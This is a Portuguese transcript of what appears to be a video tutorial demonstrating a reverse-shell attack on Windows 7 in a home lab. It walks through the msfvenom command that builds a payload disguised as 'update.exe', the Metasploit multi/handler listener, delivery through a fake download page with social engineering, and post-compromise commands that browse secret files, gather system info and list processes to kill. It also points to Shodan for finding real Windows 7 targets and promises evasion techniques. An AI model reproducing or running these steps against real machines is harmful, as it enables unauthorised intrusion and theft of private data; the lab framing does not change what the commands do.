Bom, boa tarde, galera. Depois do vídeo sobre a utilização do MSV numa plataforma Linux Debian, eu gostaria de mostrar uma outra aplicação para fins didáticos, só que uma aplicação um pouco mais prática, digamos assim, no sentido de que a proposta aqui vai ser demonstrar uma invasão feita no Windows, que é uma plataforma um pouco mais usual do que usual de uma forma mais doméstica do que o próprio Debian. Então, Debian ali, a proposta do meu vídeo anterior, se vocês não viram, assistam o vídeo do Debian, foi demonstrar um payload totalmente customizado para um servidor de Debian, perfeito? Só que o que ficou claro é que não me pareceu ser assim, a grosso modo, uma aplicação que é muito comum. O mais normal é a gente encarar alvos, né? E veja, aqui eu estou tratando de uma maneira totalmente didática, alvos que estejam usando o Windows. Para essa primeira apresentação, eu vou fazer o vídeo em duas partes. Uma apresentação um pouco mais básica, que seria essa daqui, do poder do MS Venom para executar uma invasão, um teste de penetração em cima do Windows. Eu utilizarei aqui o Windows 7, eu já vou explicar o motivo. E a parte 2, que eu vou fazer numa sequência, vai ser a mesma utilização do próprio MS Venom, talvez, só que com uma característica, algumas características mais modernas, como técnicas de evasão. Porque a plataforma do MS Venom e seus payloads são muito conhecidos pelo próprio Windows Defender e pelas novas gerações de Windows. Então, o Windows, cada vez que passa por atualizações, ele vai ficando mais seguro. Então, não se torna cada vez mais difícil, até mesmo com os mecanismos básicos de defesa do Windows, de você executar um ataque bem sucedido. Então, a princípio, eu vou adotar como exemplo, tá? Por hora, e porque eu utilizarei a forma mais básica do MS Venom para executar um shell reverso em cima do Windows 7. O Windows 7, ele ainda continua sendo, apesar dele já ter alguns anos, ainda continua sendo muito utilizado. Eu estou aqui no Shodan e aqui consta, enfim, informações estatísticas de Windows 7 que o Shodan conseguiu identificar na rede, assim, na internet como um todo. Então, nós temos bastante Windows 7 ainda disponíveis no mercado, em uso, não é o ideal, mas em uso. Então, apesar de ser um ataque que parece ser um pouco obsoleto agora, ele serve por dois motivos. O primeiro é que você ainda tem alvos, digamos assim, que poderiam ser facilmente invadidos por esse tipo de mecanismo. E outra que, a segunda, que acho que é mais importante, é a didática. Então, para apresentar o próprio MS Venom, ficaria mais fácil. Se você fosse partir para o Windows 10 ou Windows 11, teríamos que ter alguns outros artifícios que não caberia aqui já logo de primeira parte. Então, inclusive, eu gostaria de saber, se vocês gostariam de saber como que monta um laboratório de pentest. Então eu tenho aqui algumas máquinas virtuais que eu uso no meu computador. Então eu tenho um Kali Linux, um Windows 10, um Debian 12, um Debian 11 que eu uso como server, o Windows 7 que eu vou utilizar para teste, tá bom? Depois, se vocês quiserem, eu posso mostrar como aqui algumas ferramentas de alguns softwares que eu utilizo para o estudo, prática e demonstração de pentest, de Blue Team, de Red Team, não só de pentest, mas também de você, por exemplo, o PFSense, que seria um firewall, como configura um firewall para ter pelo menos uma segurança básica e por aí vai. Mas vamos ao ataque em si. Eu vou abrir aqui o que eu vou utilizar aqui como exemplo. Uma máquina com Kali Linux, perfeito, da sua última versão, e o próprio Windows 7, que será alvo. Tá? A forma que eu encontrei para
para eu conseguir enviar o payload para a minha vítima foi uma forma eu fiz uma página HTML da minha máquina Kali Linux, onde será possível executar o download. Aqui entraria uma engenharia social que eu já vou explicar logo na sequência, tá? Isso é a parte mais fácil. Mas vamos ao payload em si, para que a gente tenha condição de executar aqui o nosso ataque. Então, eu peço que vocês não se preocupem com essa tela aqui. Isso daqui é só a minha página HTML. Então, toda vez que o meu Windows ele acessa a página HTML, ele faz qualquer ação, vou atualizar ela aqui, consta um registro aqui de que ele teve a conexão, etc e tal. Mas é só para eu conseguir fazer com que a outra página faça um download. Ele poderia ser um HTML falso, enfim, vai da sua engenharia social, perfeito? Então, vamos ao código em si. Vamos iniciar aqui um payload. Então, digamos assim, vamos partir da premissa que você já sabe algumas informações do seu alvo, que ele é o Windows 7. Igual demonstrei no Shodan, é possível você identificar seus alvos, etc. Então, a proposta aqui será executar um shell reverse. Então, vamos começar por msf venom -p de payload, perfeito? Windows. Nesse caso, aquela versão de Windows, ela é 32 bits. Então, eu não vou colocar o x64 aqui, ok? Então, vou colocar o shell direto. Shell reverse tcp, ok. Meu localhost, antes disso, deixa eu demonstrar qual que é o meu localhost aqui. Deixa eu abrir outro código tá aqui. Eu vou demonstrar para vocês qual que é o meu localhost. IPA. Então, a minha máquina é 192.168.028. É lógico que aqui eu estou fazendo num ambiente meu, né, e todo controlado, não estou invadindo a privacidade de ninguém. Então, eu vou utilizar aqui o IP da minha máquina, da minha rede, certo? Mas não necessariamente seria ele se fosse algo externo, perfeito? Então, aqui é mais um título de exemplo. Então, o meu IP da minha rede é 192, deixa eu só setar ele aqui, host igual a 192.168.0.28. Perfeito. E agora a gente vai ter que setar a porta. Lport 4444. Poderia ser 5555, 6666, depende se você já tiver essa porta em uso, você pode trocar. Não há necessidade. 4444 é o mais didático e utilizado possível. Vocês vão encontrar em muitos materiais assim, tá? Então o file, que é o -f.exe, e a saída, vamos colocar um nome atrativo. Por exemplo, assim, update.exe. Então, a gente vai pedir para ele executar, para o MSV não realizar um payload para o Windows de shell reverso, e o localhost, no caso, o nosso IP da nossa máquina atacante, 92.168.0.28, lport 4444, e o file sendo um executável, um -f.exe, e com o nome do nosso payload sendo update.exe, para que tenha, digamos assim, para que ele seja convincente, certo? Depois dos comentários eu vou deixar todos esses códigos, vocês não precisam se preocupar em copiar aqui. Vamos aguardar apenas ele montar o payload aqui para nós, perfeito. Enquanto ele executa, eu gostaria de mostrar algumas informações da máquina alvo. Então, da máquina alvo, o Windows 7, eu só coloquei uma ISO para a demonstração, e eu criei alguns diretórios para que fizesse sentido o ataque. Então, nós temos aqui senhas, arquivos secretos, que são documentos para que o ataque, para que eu consiga evidenciar que o ataque foi real, e que se eu tivesse feito isso numa máquina alvo de fato, eu teria acesso a esses tipos de documentos que estão dentro do usuário Saul, que seria
esse usuário que eu criei aqui nessa máquina alvo. Mas é uma máquina normal, legítima. Então vou abrir aqui o CMD ipconfig para vocês verem que ela está conectada, ela tem conexão. Então nós temos aqui o IP interno sendo 92.168.0.30, ok? Meu gateway está tudo certinho, ela está configurada e funcional, digamos assim, tá? Deixa eu só atualizar aqui. Vamos ver agora o nosso Linux. Ops, espera aí que deu algum erro aqui. Deixa eu ver. Deixa eu ver o que aconteceu aqui. Espera aí. MSF Venom. P. Ah, tá. Menos P. O menos P ficou separado aqui. Windows. Vamos mais uma vez. Shell. Reverse. TCP. Lhost. Lhost 2 168.0.28 Lport. Nosso Lport seria 4444. Opa. Menos F exe menos O, que vai ser o nome, update.exe. Está dando algum erro no nosso código aqui. Menos F. Deixa eu só trocar aqui nsvenom. Engraçado, ele não. Vamos colocar aqui como update. msvenom. Tá, desculpa, no código anterior eu escrevi errado msvenom. Agora vai. Perdão. Eu vou deixar o código aqui embaixo, na descrição. Depois, se vocês precisarem, vocês copiem. Mas esse aqui seria o que. Tá vendo que aqui o msvenom meu ficou marcado. Eu não vou fazer edição, porque eu acho que não fica tão legítimo. Mas aqui está o nosso payload feito, então deu certo. Aqui tá vendo que o meu msvenom não ficou marcado, não presta atenção. Mas então aqui o nosso payload está criado. Então payload size, aí o final payload tem o peso dele aqui, e ele está aqui, ó, update exe. Perfeito. Agora, se você vai na máquina alvo, lá na máquina alvo ela está acessando minha máquina atacante, então o update está aqui, ó, update exe, perfeito? Só que ela ainda não vai fazer o download. Vamos primeiro executar o ms console. MSF console, porque o que iremos executar agora? Vamos deixar o MS console em listening. O que vai acontecer? A gente vai solicitar no payload um payload de multi-handler totalmente genérico. Vamos direcionar ele a ser um payload, vamos setar ele como payload de Windows e vamos deixar o próprio MSF escutando a porta 4444 para que quando o alvo faça o download e execute, a conexão seja estabelecida. Então, antes da própria conexão, seria interessante que você deixasse o MS console escutando. Então, ele acabou de iniciar. Então, de todas as opções dele, vamos escolher a opção Exploit. Né? Multi-handler. Bom, nessa opção multi-handler, vamos escolher então o set Windows x64. Apesar da minha máquina ser não pelo menos aquela ISO ela não é 64 bits, você pode escolher aqui x64 porque não vai dar problema, tá bom? Reverse TCP. Ok. Desculpa, 7 payload. Aqui, 7 payload.
Pronto, agora a gente tem ele setado. Agora, o que nós iremos fazer? Setar se você dá options, você vai observar que eu tenho que setar o localhost. E a porta já está setada, mas a gente pode setar, não tem problema nenhum. Então a gente vai e direciona o localhost para a nossa conexão. 192.168.0.28. Tá? E só por garantia eu vou setar também a porta. Set lport. Então se você dá options, você vai ver que o meu localhost está setado e minha porta está setada. Agora a gente vai e executa. Exploit. Pronto. Agora, vou esperar um pouquinho para ele executar o próprio MSF. E agora a gente vai passar a ter o exploit funcionando. Perfeito? Então, ó, ele está started reverse TCP handler e no nosso IP localhost porta 4444. Agora a gente vai para a nossa máquina alvo. Vamos dizer que houve um trabalho aí de engenharia social para convencimento de que esse software precisaria ser executado. E, basicamente, o alvo executado. Essa máquina ela tem pouquíssima proteção, tá? Então, ela fará a execução do nosso do código malicioso, no caso seria o reverse TCP, e pronto, vou lá, a gente já tem a conexão estabelecida. Então, se vocês lembram na tela anterior, estava como started reverse TCP handler, e agora command shell season one open. Então, vamos listar os diretórios nas quais nós estamos aqui. Então, veja que foi possível acessar o Ascens, txt, arquivos secretos. Então, se você colocar, vou navegar aqui, cd, arquivo, secretos. Dir, peraí que deu algum aqui. Vou colocar aqui cd, arquivo, secretos. Vamos ver se eu consigo abrir essa pasta. Aí foi. Então vamos dar um dir. Pronto. Então aqui, ó, informações secretas.txt. Então eu basicamente consegui ter acesso à máquina completa, como por exemplo assim, eu posso cd eu posso colocar cd área. Esse vai de trabalho. Não. Então vamos escolher aqui um outro comando. Deixa eu verificar aqui que eu estou mais acostumado em utilizar o próprio system info. Vamos ver se ele traz alguma informação de system info pra gente. Net user. Ele deve estar carregando. Bom, mas de qualquer maneira, aí ó, pronto, é isso mesmo. Então veja, eu consegui acesso às informações de todo o sistema da máquina, perfeito. Multiprocessador free, todas as informações da máquina, x86, tá vendo? O nome da máquina, Windows 7 Ultimate. Que mais? Usuários, só o PC. Tá certo? Eu posso dar um task kill se eu quiser no próprio, em alguma, quer ver, ó, task. Vamos colocar assim, ó, task list. Vamos ver se tem alguma coisa que o que está sendo executado. Então aqui, ó, tem várias opções do Windows nas quais estão sendo executadas nesse momento. E eu posso simplesmente escolher aqui, dar um task kill em qualquer dessas opções aqui, que ela será simplesmente fechada. Perfeito? Então, ou seja, mostra que foi possível executar um ataque perfeito no Windows e foi possível executar códigos no Windows e, enfim, ter informações que não eram para estar disponíveis dessa maneira. Perfeito? Bom, eu vou deixar aqui na descrição os códigos utilizados e se vocês tiverem qualquer dúvida, fiquem à vontade para questionar aqui embaixo nos comentários.
Obrigado e até mais.